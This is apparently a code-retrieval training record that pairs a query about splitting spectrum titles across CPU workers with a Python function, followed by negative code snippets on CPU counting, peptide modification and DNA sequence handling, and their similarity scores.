datetime.strptime((time.replace('b','')).replace('\\'',''),\"%Y-%m-%dT%H:%M:%S.%f\")\n except ValueError:\n time = datetime.strptime((time.replace('b','')).replace('\\'',''),\"%Y-%m-%dT%H:%M:%S\")\n deltatime = time - time_ref\n times_proc.append(deltatime.total_seconds())\n\n self.times = np.array(times_proc)\n print('Measurement contains {} spectra with {} wavelengths \\n'.format(len(self.times),len(self.wavelengths)))\n\n # data is stored as a pd Dataframe with elapsed times as indices and wavelengths as columns\n pre_proc_data = pd.DataFrame(corr_data, index = self.times, columns = self.wavelengths)\n\n # data may be disordered in time when iterated through\n # sort the data by elapsed time\n self.pre_proc_data = pre_proc_data.sort_index(axis=0)\n self.times = np.sort(self.times)\n\n t1_stop = perf_counter()\n print(\"Elapsed time for pre-processing:\", t1_stop-t1_start)\n\n return self.pre_proc_data"
] |
[
"0.6365543",
"0.6278067",
"0.61542547",
"0.5983721",
"0.5951358",
"0.59303653",
"0.5856723",
"0.5846219",
"0.58419764",
"0.5743628",
"0.56974417",
"0.56961113",
"0.56395173",
"0.56236494",
"0.5586922",
"0.5574862",
"0.556438",
"0.55371463",
"0.55307126",
"0.55262214",
"0.5522019",
"0.5516359",
"0.5497918",
"0.5481034",
"0.5458032",
"0.5411737",
"0.54013675",
"0.53916466",
"0.53893816",
"0.5365748"
] |
0.7796184
|
0
|
Take a list and return a list containing num_cpu smaller lists with the spectrum titles/peptides that will be split across the workers
|
def prepare_titles(titles, num_cpu):
    # titles might be ordered from small to large peptides,
    # shuffling improves parallel speeds
    shuffle(titles)
    split_titles = [
        titles[i * len(titles) // num_cpu : (i + 1) * len(titles) // num_cpu]
        for i in range(num_cpu)
    ]
    logger.debug(
        "{} spectra (~{:.0f} per cpu)".format(
            len(titles), np.mean([len(a) for a in split_titles])
        )
    )
    return split_titles
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def list_cpus():\n online_cpus = osutil.get_online_cpus()\n offline_cpus = POSSIBLE_CPUS - online_cpus\n print(\"Online: CPU \", shorten_cores(online_cpus))\n print(\"Offline: CPU \", shorten_cores(offline_cpus))",
"def cpu_online_map():\r\n cpuinfo = get_cpuinfo()\r\n cpus = []\r\n for cpu in cpuinfo:\r\n cpus.append(cpu['processor']) # grab cpu number\r\n return cpus",
"def available_cpu_list():\n \n def expand(s):\n if s.count(\"-\") == 1:\n numbers = re.findall(r'(\\d+)', s)\n start = int(numbers[0])\n end = int(numbers[1])\n return list(range(start, end+1))\n \n elif s.count(\"-\") == 0:\n return [int(s)]\n else:\n print(\"The string cannot have more than one dash mark (-).\")\n\n # cpuset\n # cpuset may restrict the number of *available* processors\n try:\n m = re.search(r'(?m)^Cpus_allowed_list:\\s*(.*)$',\n open('/proc/self/status').read())\n if m:\n group = m.group(1)\n # group=\"0-7,9-10, 14\"\n \n m = re.findall(r'(\\d+(-\\d+)?)', group)\n items = [item[0] for item in m]\n \n cpus = []\n for item in items:\n cpus += expand(item)\n \n return cpus\n except IOError:\n raise IOError(\"Could not read /proc/self/status\")",
"def get_cpus():\n\n # Get the list of offline CPU cores\n offline_cpus = subprocess.check_output(\n \"lscpu | grep '^Off-line CPU(s) list:' | awk -F: '{print $2}'\",\n shell=True\n ).strip().decode()\n\n # Get the number of total CPU cores\n total_cpus = subprocess.check_output(\n \"lscpu | grep '^CPU(s):' | awk '{print $2}'\",\n shell=True\n ).strip().decode()\n\n return total_cpus, offline_cpus",
"def cpus(self):\n return self.__cpus",
"def number_of_workers():\n return (cpu_count() * 2) + 1",
"def _GetThreadsQpsPerLoaderList():\n\n def _FormatThreadQps(thread_qps):\n thread_qps_pair = thread_qps.split(':')\n if len(thread_qps_pair) == 1:\n thread_qps_pair.append(0)\n return [int(val) for val in thread_qps_pair]\n\n return [\n _FormatThreadQps(thread_qps)\n for thread_qps in FLAGS.ycsb_threads_per_client\n ]",
"def compute_cores(config):\n cores = config.getint('General','cores')\n if cores > mp.cpu_count():\n cores = mp.cpu_count()\n return cores",
"def number_of_workers():\n return (multiprocessing.cpu_count() * 2) + 1",
"def calculate_cpu_parameters(self):\n\n # Calculate the cpu parameters, needed for the\n # vpp_startup and grub configuration\n for i in self._nodes.items():\n node = i[1]\n\n # get total number of nic ports\n interfaces = node[\"interfaces\"]\n\n # Make a list of ports by numa node\n ports_per_numa = self._create_ports_per_numa(node, interfaces)\n\n # Get the number of cpus to skip, we never use the first cpu\n other_cpus_start = 1\n other_cpus_end = other_cpus_start + node[\"cpu\"][\"total_other_cpus\"] - 1\n other_workers = None\n if other_cpus_end != 0:\n other_workers = (other_cpus_start, other_cpus_end)\n node[\"cpu\"][\"other_workers\"] = other_workers\n\n # Allocate the VPP main core and workers\n vpp_workers = []\n reserve_vpp_main_core = node[\"cpu\"][\"reserve_vpp_main_core\"]\n total_vpp_cpus = node[\"cpu\"][\"total_vpp_cpus\"]\n total_rx_queues = node[\"cpu\"][\"total_rx_queues\"]\n\n # If total_vpp_cpus is 0 or is less than the numa nodes with ports\n # then we shouldn't get workers\n total_workers_node = 0\n if len(ports_per_numa):\n total_workers_node = total_vpp_cpus // len(ports_per_numa)\n total_main = 0\n if reserve_vpp_main_core:\n total_main = 1\n total_mbufs = 0\n if total_main + total_workers_node != 0:\n for item in ports_per_numa.items():\n numa_node = item[0]\n value = item[1]\n\n # Get the number of descriptors and queues\n mbufs = self._calc_desc_and_queues(\n len(ports_per_numa),\n len(value[\"interfaces\"]),\n total_rx_queues,\n value,\n )\n total_mbufs += mbufs\n\n # Get the VPP workers\n reserve_vpp_main_core = self._calc_vpp_workers(\n node,\n vpp_workers,\n numa_node,\n other_cpus_end,\n total_workers_node,\n reserve_vpp_main_core,\n )\n\n total_mbufs *= 2.5\n total_mbufs = int(total_mbufs)\n else:\n total_mbufs = 0\n\n # Save the info\n node[\"cpu\"][\"vpp_workers\"] = vpp_workers\n node[\"cpu\"][\"total_mbufs\"] = total_mbufs\n\n # Write the config\n self.updateconfig()",
"def determine_jobs_per_pool(numpools, totaljobs):\n cluster = os.environ['CC_CLUSTER']\n if cluster in ['graham', 'beluga']:\n jobs_per_pool = math.floor(totaljobs / numpools)\n else:\n jobs_per_pool = totaljobs\n return jobs_per_pool",
"def ncpu ( events ) :\n #\n n_cores = numcpu() \n if n_cores <= 1 : return ROOT.RooFit.NumCPU ( 1 ) ## fake!!! \n #\n n = events // _nemax\n if n <= 1 : return ROOT.RooFit.NumCPU ( 1 ) ## fake!!! \n #\n num = min ( n , n_cores , _ncmax )\n if not _ncpus : _ncpus.append ( num ) \n #\n return ROOT.RooFit.NumCPU ( num )",
"def compute_workload(num_cores, num_flows, spread):\r\n # sigma is the sum of the normalized processing velocity scores\r\n # for each cluster processor. In a perfect world, sigma == num_cores\r\n # and the normalized processing velocity (in spread) == 1.0\r\n\r\n sigma = fsum(spread[0:num_cores])\r\n workload = [trunc((num_flows * x / sigma))for x in spread[0:num_cores]]\r\n\r\n while sum(workload) < num_flows:\r\n finish = workload[0] / spread[0]\r\n i = 0\r\n for x in range(1, num_cores):\r\n t = workload[x] / spread[x]\r\n if t < finish:\r\n finish = t\r\n i = x\r\n workload[i] += 1\r\n return workload",
"def get_cpuvals(inteval = 1):\n cpu_array = psutil.cpu_percent(inteval, percpu=True)\n return {\n 'CPUCore1': cpu_array[0],\n 'CPUCore2': cpu_array[1],\n 'CPUCore3': cpu_array[2],\n 'CPUCore4': cpu_array[3],\n 'CPU': sum(cpu_array)/4\n }",
"def get_cores(sockets):\n cores = []\n for skt in sockets:\n cores.extend(SOCKET_DICT[skt])\n\n return cores",
"def make_slices(big_scriptlist):\n num_cores = multiprocessing.cpu_count()\n list_of_scriptlists = [] # This will be our output.\n incrementlist = range(0,len(big_scriptlist),num_cores) # How we increment.\n for i in incrementlist:\n list_of_scriptlists.append(big_scriptlist[i:i+num_cores])\n return list_of_scriptlists",
"def get_overall_cpu_util(dut, exclude_proc_name=None):",
"def sub_processor(lock, pid, video_list):\r\n text = 'processor %d' % pid\r\n with lock:\r\n progress = tqdm.tqdm(\r\n total=len(video_list),\r\n position=pid,\r\n desc=text\r\n )\r\n for i in range(len(video_list)):\r\n video_name = video_list[i]\r\n \"\"\" Read result csv file \"\"\"\r\n df = pd.read_csv(os.path.join(config.post_csv_load_dir, video_name + \".csv\"))\r\n \"\"\" Calculate final score of proposals \"\"\"\r\n df['score'] = df.iou.values[:] * df.start.values[:] * df.end.values[:]\r\n if len(df) > 1:\r\n df = softNMS(df)\r\n df = df.sort_values(by=\"score\", ascending=False)\r\n video_info = video_dict[video_name]\r\n video_duration = video_info[\"duration_second\"]\r\n proposal_list = []\r\n\r\n for j in range(min(top_number, len(df))):\r\n tmp_proposal = {}\r\n tmp_proposal[\"score\"] = df.score.values[j]\r\n tmp_proposal[\"segment\"] = [max(0, df.xmin.values[j]) * video_duration,\r\n min(1, df.xmax.values[j]) * video_duration]\r\n tmp_proposal[\"label\"] = \"行走\"\r\n # tmp_proposal[\"label\"] = \"Fun sliding down\"\r\n proposal_list.append(tmp_proposal)\r\n result_dict[video_name] = proposal_list\r\n with lock:\r\n progress.update(1)\r\n\r\n with lock:\r\n progress.close()",
"def eval_cpuset():\n\tnum_cpu = run('grep -c ^processor /proc/cpuinfo',quiet=True,warn_only=True)\n\tprint(red('Number of cpus : \\t'+num_cpu))",
"def per_cpu_times():\n ret = []\n for user, system, idle, interrupt, dpc in cext.per_cpu_times():\n item = scputimes(user, system, idle, interrupt, dpc)\n ret.append(item)\n return ret",
"def cpu_count():\n num_available_cores = multiprocessing.cpu_count()\n return num_available_cores",
"def getASDistributionbyCpu(num_as,node_files):\n node_list = []\n num_cpus = 0\n for n in node_files:\n with open(n) as nfd:\n dati = json.load(nfd)\n obj = {}\n obj['name'] = n.split(\"/\", 1)[1]\n obj['cpus'] = dati['ansible_facts']['ansible_processor_vcpus']\n obj['as_list'] = []\n node_list.append(obj)\n num_cpus += obj['cpus']\n\n as_per_cpu = num_as / num_cpus\n as_list = []\n if as_per_cpu < 1:\n as_per_cpu = 1\n print(num_cpus)\n print(as_per_cpu)\n # Deploy an even number of ases on the nodes\n as_to_deploy = 1\n for n in node_list:\n for i in range(0,n['cpus']):\n for j in range(0,int(as_per_cpu)):\n if as_to_deploy <= num_as:\n n['as_list'].append(as_to_deploy)\n as_list.append({'as':as_to_deploy, 'node':n['name']})\n as_to_deploy += 1\n\n # Now the nodes are evenly loaded, if we still have something to place, just put it\n # one per core\n if as_to_deploy < num_as:\n for n in node_list:\n for i in range(0,n['cpus']):\n if as_to_deploy <= num_as:\n n['as_list'].append(as_to_deploy)\n as_list.append({'as':as_to_deploy, 'node':n['name']})\n as_to_deploy += 1\n\n return(node_list,as_list)",
"def get_ncpu():\n from multiprocessing import cpu_count\n return cpu_count()",
"def cpu_count_cores():\n return cext.cpu_count_cores()",
"def calculatePixelMetricsMP(input_img, input_df, num_workers=8):\n\n manager = Manager()\n new_cir = manager.list()\n q = Queue()\n for index, row in input_df.iterrows():\n plot = row['plot']\n x = row['x']\n y = row['y']\n r = row['r']\n weight = row['weight']\n info = [plot, x, y, r, weight]\n q.put(info)\n workers = Pool(num_workers, calculatePixelMetricsQueue,(q, input_img, input_df, new_cir))\n workers.close()\n workers.join()\n \n header = ['plot', 'x', 'y', 'r', 'weight', 'core', 'inner', 'outer']\n print(len(new_cir))\n output_df = pd.DataFrame(list(new_cir), columns=header)\n return output_df",
"def workers_per_encoding(self):\n # type: () -> int\n return self._workers_per_encoding",
"def get_total_n_cpu(self) -> int:",
"def _cpus(cls):\n # The real processor map is found at different paths based on cgroups version:\n # - cgroupsv1: /cpuset.cpus\n # - cgroupsv2: /cpuset.cpus.effective\n # For more details, see https://docs.kernel.org/admin-guide/cgroup-v2.html#cpuset-interface-files\n cpulist = None\n for path in [\n Path(\"/sys/fs/cgroup/cpuset/cpuset.cpus\"),\n Path(\"/sys/fs/cgroup/cpuset.cpus.effective\"),\n ]:\n if path.exists():\n cpulist = path.read_text(\"ascii\").strip()\n break\n else:\n raise RuntimeError(\"Could not find cgroups cpuset\")\n return ListFormatParser(cpulist).parse()",
"def cpu_ids() -> List[int]:\n api_file = open('/sys/devices/system/cpu/present', 'r')\n\n cpu_id_tmp = re.findall('\\d+|-', api_file.readline().strip())\n cpu_id_list = []\n for i in range(len(cpu_id_tmp)):\n if cpu_id_tmp[i] == '-':\n for cpu_id in range(int(cpu_id_tmp[i - 1]) + 1, int(cpu_id_tmp[i + 1])):\n cpu_id_list.append(int(cpu_id))\n else:\n cpu_id_list.append(int(cpu_id_tmp[i]))\n return cpu_id_list",
"def cpu(self) -> List[float]:\n return list(map(attrgetter(\"cpu\"), self.stats))"
] |
[
"0.616638",
"0.61011267",
"0.6081063",
"0.5938948",
"0.5843389",
"0.5820567",
"0.5801597",
"0.57924116",
"0.5734133",
"0.5724693",
"0.57013386",
"0.56822085",
"0.5660021",
"0.5649293",
"0.56469005",
"0.5628331",
"0.56077605",
"0.560498",
"0.5600769",
"0.557037",
"0.5559987",
"0.55577034",
"0.55496216",
"0.551584",
"0.5509583",
"0.55054814",
"0.55030096",
"0.54921395",
"0.54772353",
"0.54687786"
] |
0.6506117
|
0
|
Takes a peptide sequence and a set of modifications. Returns the modified version of the peptide sequence, with C- and N-terminal modifications. These modified versions are hard-coded in ms2pipfeatures_c.c for now.
|
def apply_mods(peptide, mods, PTMmap):
    modpeptide = np.array(peptide[:], dtype=np.uint16)  # Copy to avoid inplace changes
    if mods != "-":
        l = mods.split("|")
        # Modifications are encoded as alternating "position|name" pairs,
        # so the split list must have an even number of elements
        if len(l) % 2 != 0:
            raise InvalidModificationFormattingError(mods)
        for i in range(0, len(l), 2):
            tl = l[i + 1]
            try:
                mod = PTMmap[tl]
            except KeyError:
                raise UnknownModificationError(tl)
            try:
                modpeptide[int(l[i])] = mod
            except IndexError:
                raise InvalidModificationFormattingError(
                    f"Amino acid position not in peptide for modifications: `{mods}`"
                )
    return modpeptide
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def define_seq_modifications():\n modifications = {\n '0': {\n 'colour': 'k',\n 'name': 'unmodified',\n },\n '1': {\n 'colour': 'firebrick',\n 'name': 'succinylated',\n 'target_res': 'LYS',\n 'replace_res': 'GLU',\n }\n }\n\n return modifications",
"def getRevCodonSeqs(self):\r\n compDict = {'A': 't', 'T': 'a', 'G': 'c', 'C': 'g'} # nuc compliments for reverse strand\r\n revPep = [] # list to hold the temporary reverse peptides before incorporation into the complete list\r\n for seq in self.allPepSeqs:\r\n revSeq = seq[::-1] # reverses the strand to be prepped for nt compliments\r\n for nuc in compDict:\r\n revSeq = revSeq.replace(nuc, compDict[nuc]) # replaces nt's with their compliments\r\n revSeq = revSeq.upper()\r\n revPep.append(revSeq)\r\n for i in revPep:\r\n self.allPepSeqs.append(i) # adds the reverse strand peptide to the list of possible peptide seqs\r\n return",
"def _parse_peptidoform(seq: str, modification_list: list[dict], charge: Union[int, None]):\n peptide = [\"\"] + list(seq) + [\"\"]\n\n # Add modification labels\n for mod in modification_list:\n peptide[int(mod[\"location\"])] += f\"[{mod['name']}]\"\n\n # Add dashes between residues and termini, and join sequence\n peptide[0] = peptide[0] + \"-\" if peptide[0] else \"\"\n peptide[-1] = \"-\" + peptide[-1] if peptide[-1] else \"\"\n proforma_seq = \"\".join(peptide)\n\n # Add charge state\n if charge:\n proforma_seq += f\"/{charge}\"\n\n return Peptidoform(proforma_seq)",
"def add_mods(tup):\n _, row = tup\n params = get_params()\n mod_versions = [dict()]\n\n # First add all fixed modifications\n for mod in params['modifications']:\n if mod['fixed']:\n if not mod['n_term'] and mod['amino_acid']:\n mod_versions[0].update({i:mod['name'] for i, aa in enumerate(row['peptide']) if aa == mod['amino_acid']})\n elif mod['n_term']:\n if mod['amino_acid']:\n if row['peptide'][0] == mod['amino_acid']:\n mod_versions[0]['N'] = mod['name']\n else:\n mod_versions[0]['N'] = mod['name']\n\n # Continue with variable modifications\n for mod in params['modifications']:\n if mod['fixed']:\n continue\n\n # List all positions with specific amino acid, to avoid combinatorial explotion, limit to 4 positions\n all_pos = [i for i, aa in enumerate(row['peptide']) if aa == mod['amino_acid']]\n if len(all_pos) > 4:\n all_pos = all_pos[:4]\n for version in mod_versions:\n # For non-position-specific mods:\n if not mod['n_term']:\n pos = [p for p in all_pos if p not in version.keys()]\n combos = [x for l in range(1, len(pos) + 1) for x in combinations(pos, l)]\n for combo in combos:\n new_version = version.copy()\n for pos in combo:\n new_version[pos] = mod['name']\n mod_versions.append(new_version)\n\n # For N-term mods and N-term is not yet modified:\n elif mod['n_term'] and 'N' not in version.keys():\n # N-term with specific first AA:\n if mod['amino_acid']:\n if row['peptide'][0] == mod['amino_acid']:\n new_version = version.copy()\n new_version['N'] = mod['name']\n mod_versions.append(new_version)\n # N-term without specific first AA:\n else:\n new_version = version.copy()\n new_version['N'] = mod['name']\n mod_versions.append(new_version)\n\n df_out = pd.DataFrame(columns=row.index)\n df_out['modifications'] = ['|'.join('{}|{}'.format(0, value) if key == 'N'\n else '{}|{}'.format(key + 1, value) for key, value\n in version.items()) for version in mod_versions]\n df_out['modifications'] = ['-' if not mods else mods for mods in df_out['modifications']]\n df_out['spec_id'] = ['{}_{:03d}'.format(row['spec_id'], i) for i in range(len(mod_versions))]\n df_out['charge'] = row['charge']\n df_out['peptide'] = row['peptide']\n if 'protein_list' in row.index:\n df_out['protein_list'] = str(row['protein_list'])\n return df_out",
"def modify_SEQ(self, seq_in, cigar_list_in):\n seq = seq_in[:] # Make a copy.\n cigar_list = cigar_list_in[:]\n # Placeholder for the new sequence.\n new_seq = \"\"\n for item in cigar_list:\n # Number of operations.\n num = int(item[:-1])\n # Operation.\n letter = item[-1]\n if letter == \"M\" and num == len(seq_in):\n return seq_in\n if True:\n # Matches or mismatches.\n if letter in [\"M\", \"X\"]:\n new_seq += seq[:num]\n seq = seq[num:]\n\n # Hard-clips or skipped regions.\n elif letter in [\"H\", \"N\"]:\n seq = seq[num:]\n new_seq += num * \" \"\n # Deletions.\n elif letter == \"D\":\n seq = seq[num:]\n new_seq += num * \"~\"\n # Paddings, insertions, soft-clips.\n elif letter in [\"P\", \"I\", \"S\"]:\n seq = seq[num:]\n # Sequence match.\n elif letter == \"=\":\n new_seq = seq\n\n return new_seq",
"def get_complex_modifications(complex_modification_file, protein_complex_file):\n\n complex_mods = pandas.read_table(fixpath(complex_modification_file))\n complex_mods = complex_mods.set_index('Modified_enzyme')\n\n complex_set = \\\n set(get_complex_subunit_stoichiometry(protein_complex_file).keys())\n\n # ignore complexes which are produced in the reaction matrix\n rxn_dict = get_reaction_matrix_dict('reaction_matrix.txt',\n complex_set=complex_set)\n ignored_complexes = set()\n for met_stoich in rxn_dict.values():\n for met, value in iteritems(met_stoich):\n if 'mod_c' not in met:\n ignored_complexes.add(met.replace('_c', ''))\n else:\n ignored_complexes.add(met)\n # don't ignore these. They are included in the reaction matrix but still\n # must be formed via a complex formation reaction\n # TODO look into this list closer\n ignored_complexes.remove('CPLX0-782_mod_2:4fe4s')\n\n new_mod_dict = {}\n for key, value in iteritems(complex_mods.T.to_dict()):\n if key.startswith('#') or key in ignored_complexes:\n continue\n key = key.replace('_DASH_', '__')\n new_mod_dict[key] = {}\n new_mod_dict[key]['core_enzyme'] = value['Core_enzyme']\n new_mod_dict[key]['modifications'] = {}\n for mods in value['Modifications'].split(' AND '):\n mod, num_mods = mods.rstrip(')').split('(')\n if num_mods == '':\n num_mods = 1.\n else:\n num_mods = float(num_mods)\n\n mod = mod.replace('_DASH_', '__')\n new_mod_dict[key]['modifications'][mod + '_c'] = -num_mods\n\n new_mod_dict = corrections.correct_complex_modification_dict(new_mod_dict)\n\n return new_mod_dict",
"def main(argv=None):\n\n if argv is None:\n argv = sys.argv\n\n parser = E.OptionParser(\n version=\"%prog version: $Id: optic/cds2codons.py 2781 2009-09-10 11:33:14Z andreas $\")\n\n parser.add_option(\"-m\", \"--map\", dest=\"filename_map\", type=\"string\",\n help=\"filename with mapping information.\")\n parser.add_option(\"-f\", \"--format\", dest=\"format\", type=\"string\",\n help=\"output file format [fasta-codons].\")\n parser.add_option(\"-c\", \"--codons\", dest=\"codons\", action=\"store_true\",\n help=\"print codons separated by spaces.\")\n\n parser.set_defaults(\n filename_cds=None,\n codons=False,\n format=\"fasta\",\n filename_map=None,\n )\n\n (options, args) = E.Start(parser, add_pipe_options=True)\n\n if not options.filename_map:\n raise \"please supply filename with map between peptide to cds.\"\n\n if options.filename_map:\n map_old2new = {}\n for line in open(options.filename_map, \"r\"):\n if line[0] == \"#\":\n continue\n m = Map()\n m.Read(line)\n map_old2new[m.mToken] = m\n else:\n map_old2new = {}\n\n if options.filename_cds:\n sequences = Genomics.ReadPeptideSequences(\n open(options.filename_cds, \"r\"))\n else:\n sequences = Genomics.ReadPeptideSequences(sys.stdin)\n\n if options.loglevel >= 1:\n print \"# read %i sequences\" % len(sequences)\n sys.stdout.flush()\n\n ninput, nskipped, noutput, nerrors, nstops = 0, 0, 0, 0, 0\n\n for key, s in sequences.items():\n\n ninput += 1\n\n if key not in map_old2new:\n nskipped += 1\n continue\n\n out_seq = []\n\n m = map_old2new[key]\n m.Expand()\n mm = m.mMapOld2New\n\n if mm.getColTo() > len(s):\n options.stderr.write(\"# error for %s: sequence shorter than alignment: %i < %i\\n\" % (\n key, len(s), mm.getColTo()))\n nerrors += 1\n continue\n\n for x in range(mm.getRowFrom(), mm.getRowTo() + 1):\n\n y = mm.mapRowToCol(x)\n if y > 0:\n out_seq.append(s[y - 1])\n\n m.Clear()\n\n out_seq = \"\".join(out_seq)\n translation = Genomics.TranslateDNA2Protein(out_seq)\n\n if \"X\" in translation:\n nstops += 1\n\n if options.codons:\n out_seq = \" \".join([out_seq[x:x + 3]\n for x in range(0, len(out_seq), 3)])\n\n noutput += 1\n options.stdout.write(\">%s\\n%s\\n\" % (key, out_seq))\n\n options.stderr.write(\"# input=%i, output=%i, errors=%i, stops=%i\\n\" % (\n ninput, noutput, nerrors, nstops))\n\n E.Stop()",
"def annotate_effect(cds_dict, genome, snp):\n # List to save the coding effect\n coding_effect = []\n \n # Change the SNP position from 1-indexed to 0-indexed\n snp = (snp[0]-1, snp[1])\n \n # Determine which genes the SNP is located in\n genes = []\n for k,v in cds_dict.items():\n if snp[0] in range(v.location.start, v.location.end): \n genes.append(k)\n # Check that SNP is in a gene\n if genes: \n # Some SNPs will be in more than one gene, SARS has overlaping ORFs\n for gene in genes: \n gene_tuple = list(zip(list(cds_dict[gene].location), cds_dict[gene].location.extract(genome)))\n # Get the indicies relative to the gene, add 1 to get 1-indexed values\n indicies = [x + 1 for x, y in enumerate(gene_tuple) if y[0] == snp[0]]\n # Determine codon position from gene index\n for i in indicies:\n # First position in codon\n if i % 3 == 1:\n codonpos = 1\n wtcodon = [gene_tuple[i-1], gene_tuple[i], gene_tuple[i+1]]\n # Second position in codon\n elif i % 3 == 2:\n codonpos = 2\n wtcodon = [gene_tuple[i-2], gene_tuple[i-1], gene_tuple[i]]\n # Third position in codon \n elif i % 3 == 0:\n codonpos = 3\n wtcodon = [gene_tuple[i-3], gene_tuple[i-2], gene_tuple[i-1]]\n \n # From the wt codon sequence, determine the alterative codon, coding change, and effect\n altcodon = [snp if i == (codonpos-1) else b for i, b in enumerate(wtcodon)]\n wtaa = translate(\"\".join(y for x,y in wtcodon))\n altaa = translate(\"\".join(y for x,y in altcodon))\n if wtaa == altaa:\n effect = \"synonymous\"\n elif wtaa != altaa and altaa == '*':\n effect = \"nonsense\"\n elif wtaa != altaa and altaa != '*':\n effect = \"missense\"\n # Save the codon effects and information\n coding_effect.append((codonpos, f\"{wtaa}{-(i // -3)}{altaa}\", effect, gene))\n # If the SNP isn't in a gene, it's intergeneic and has no coding effect\n else:\n coding_effect.append((\"NA\", \"NA\", \"NA\", \"intergeneic\"))\n \n \n # Deal with SNPs in multiple genes with multiple effects \n if len(coding_effect) == 1:\n return list(coding_effect[0])\n else: \n if len(set([(a,b,c) for a,b,c,d in coding_effect])) == 1: \n return list(list(set(coding_effect))[0])\n # TODO: Deal with ambiguous sequences\n else:\n return [\"NA\", \"NA\", \"NA\", \"ambiguous\"]",
"def test_sequence_modify(self):\n self.t(\"1,2 modify +xyz\")\n code, out, err = self.t(\"_get 1.tags 2.tags\")\n self.assertEqual(\"xyz xyz\\n\", out)",
"def mutate(self, generation):\n new_generation = []\n for chromosome in generation:\n if self.show_mutation_internals:\n print(\"\\nChromosome being worked on: \", chromosome, \"\\n\")\n chromosome_bit_array = []\n for char in chromosome:\n binary_char = bin(ord(char))\n if self.show_mutation_internals:\n print(\"Char: \", char, \" ASCII #:\", ord(char), \" Binary Char:\", binary_char)\n new_binary_char_array = ['0', 'b', '1']\n for bit in binary_char[3:]:\n if self.decision(self.mutation_rate):\n flipped_bit = int(bit) ^ 1\n if self.show_mutation_internals:\n print(\"Bit: \", str(bit), \" Flipped Bit:\", str(flipped_bit))\n new_binary_char_array.append(str(flipped_bit))\n else:\n if self.show_mutation_internals:\n print(\"Bit: \", str(bit))\n new_binary_char_array.append(str(bit))\n new_binary_char = ''.join(new_binary_char_array)\n if self.show_mutation_internals:\n print(\"New Char:\", chr(int(new_binary_char, 2)), \" ASCII #:\",\n int(new_binary_char, 2), \" Binary Char:\", new_binary_char, \"\\n\")\n chromosome_bit_array.append(new_binary_char)\n new_chromosome = self.bit_array_to_string(chromosome_bit_array)\n if self.show_mutation_internals:\n print(\"Chromosome pre-mutation: \", chromosome)\n print(\"Chromosome post-mutation: \", new_chromosome, \"\\n\")\n new_generation.append(new_chromosome)\n return new_generation",
"def proteinTranslation(seq, geneticCode = STANDARD_GENETIC_CODE):\n\n seq = seq.replace('T','U') # Make sure we have RNA sequence\n proteinSeq = []\n \n i = 0\n while i+2 < len(seq):\n \n codon = seq[i:i+3]\n aminoAcid = geneticCode[codon]\n \n if aminoAcid is None: # Found stop codon\n break\n\n proteinSeq.append(aminoAcid)\n i += 3\n\n return proteinSeq",
"def translate_sequence(sequence, genetic_code = {'GUC': 'V', 'ACC': 'T', 'GUA': 'V', 'GUG': 'V', 'ACU': 'T', 'AAC': 'N', 'CCU': 'P', 'UGG': 'W', 'AGC': 'S', 'AUC': 'I', 'CAU': 'H', 'AAU': 'N', 'AGU': 'S', 'GUU': 'V', 'CAC': 'H', 'ACG': 'T', 'CCG': 'P', 'CCA': 'P', 'ACA': 'T', 'CCC': 'P', 'UGU': 'C', 'GGU': 'G', 'UCU': 'S', 'GCG': 'A', 'UGC': 'C', 'CAG': 'Q', 'GAU': 'D', 'UAU': 'Y', 'CGG': 'R', 'UCG': 'S', 'AGG': 'R', 'GGG': 'G', 'UCC': 'S', 'UCA': 'S', 'UAA': '*', 'GGA': 'G', 'UAC': 'Y', 'GAC': 'D', 'UAG': '*', 'AUA': 'I', 'GCA': 'A', 'CUU': 'L', 'GGC': 'G', 'AUG': 'M', 'CUG': 'L', 'GAG': 'E', 'CUC': 'L', 'AGA': 'R', 'CUA': 'L', 'GCC': 'A', 'AAA': 'K', 'AAG': 'K', 'CAA': 'Q', 'UUU': 'F', 'CGU': 'R', 'CGC': 'R', 'CGA': 'R', 'GCU': 'A', 'GAA': 'E', 'AUU': 'I', 'UUG': 'L', 'UUA': 'L', 'UGA': '*', 'UUC': 'F'}, start_pos = 0):\n #find first orf\n #first_orf_seq = find_first_orf(sequence)\n\n # ensure sequence is uppercase\n seq = sequence.upper()\n\n #translate the sequence\n protein = \"\"\n for i in range(0, len(seq) - (len(seq) % 3), 3):\n codon = seq[i:i + 3]\n if genetic_code[codon] == \"*\":\n break\n protein += genetic_code[codon]\n return protein",
"def editsequence(dna, source_sequence, destination_sequence=None, start=0, end=None, strand=1, product=None, process_name=None, \n process_description=None, pn=None, pd=None, quinable=True, **kwargs):\n kwargs.setdefault(\"_sourcefile\", None) \n kwargs.setdefault(\"process_id\", None)\n kwargs.setdefault(\"original_ids\", []) \n _sourcefile = kwargs[\"_sourcefile\"] \n process_id = kwargs[\"process_id\"] \n original_ids = kwargs[\"original_ids\"]\n\n project = None\n project = project if product is None else product\n process_name = pn if process_name is None else process_name\n process_description = pd if process_description is None else process_description\n\n dna = copy.deepcopy(dna) \n start = 0 if start == len(dna.seq) else start\n end = len(dna.seq) if end is None else end\n strand = 1 if strand is None else strand \n if start == 0 and end == len(dna.seq):\n subject = dna.seq\n else:\n subject = dna.printsequence(start, end, strand)\n\n _mode = \"edit\"\n feat_list = [] \n if source_sequence is None:\n segment = dna.__class__(seq=re.sub(subject, value, subject, quinable=0)) \n else:\n source = source_sequence.upper() \n query = source \n if strand == 1 or strand == -1:\n if destination_sequence is None:\n _mode = \"search\"\n feature_list = get_matchlist_regex(dna, query, value=None, subject=subject, s=start, e=end, strand=strand) \n else:\n segment = get_matchlist_regex(dna, query, value=destination_sequence, subject=subject, s=start, e=end, strand=strand) \n else:\n ValueError(\"When edit the sequence, the sequence strand to be edit should be '-1' or '+1.'\")\n \n if _mode == \"edit\":\n segment._history_feature = dna._history_feature\n if start == 0 and end == len(dna.seq):\n new_dna = segment\n elif start == 0:\n new_dna = joindna(segment, cropdna(dna,e,len(dna.seq)))\n elif end == len(dna.seq):\n new_dna = joindna(cropdna(dna,0,s), segment)\n else:\n new_dna = joindna(cropdna(dna, 0, s), segment, cropdna(dna, e, len(dna.seq))) \n \n if dna.topology == \"circular\":\n new_dna._topology = \"circular\"\n else:\n pass \n\n original_id = dna._product_id\n if project is None:\n new_dna._unique_id = dna._unique_id\n else:\n new_dna._unique_id = project\n \n history_features = [new_dna._history_feature] \n if type(source_sequence) == new_dna.seq.__class__:\n if 